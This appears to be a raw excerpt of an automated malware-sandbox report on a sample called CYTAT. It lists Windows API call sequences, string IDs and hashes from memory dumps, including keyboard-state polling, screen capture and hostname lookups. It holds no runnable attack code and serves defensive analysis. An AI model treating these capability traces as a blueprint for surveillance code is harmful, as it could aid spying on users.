                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                • String ID: %s%u
                                                • API String ID: 1899580136-679674701
                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu$Sleep
                                                • String ID: 0
                                                • API String ID: 1196289194-4108050209
                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0043143E
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                • String ID: (
                                                • API String ID: 3300687185-3887548279
                                                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1976180769-4113822522
                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                • String ID:
                                                • API String ID: 461458858-0
                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3969911579-0
                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                • String ID: 0
                                                • API String ID: 956284711-4108050209
                                                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Similarity
                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                Similarity
                                                • API ID: SendString$_memmove_wcslen
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                APIs
                                                • GetParent.USER32 ref: 00445BF8
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                Similarity
                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                APIs
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                Similarity
                                                • API ID: MessageSend$CharNext
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                • _wcscpy.LIBCMT ref: 004787E5
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                Similarity
                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                • String ID: %.15g$0x%p$False$True
                                                APIs
                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                Similarity
                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                APIs
                                                • timeGetTime.WINMM ref: 00443B67
                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                • IsWindow.USER32(?), ref: 00443C3A
                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                Similarity
                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                • String ID: BUTTON
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • _wprintf.LIBCMT ref: 00454074
                                                • __swprintf.LIBCMT ref: 004540A3
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                • _memmove.LIBCMT ref: 00467EB8
                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                • _memmove.LIBCMT ref: 00467F6C
                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                • String ID:
                                                • API String ID: 2170234536-0
                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                APIs
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                • String ID:
                                                • API String ID: 3218148540-0
                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
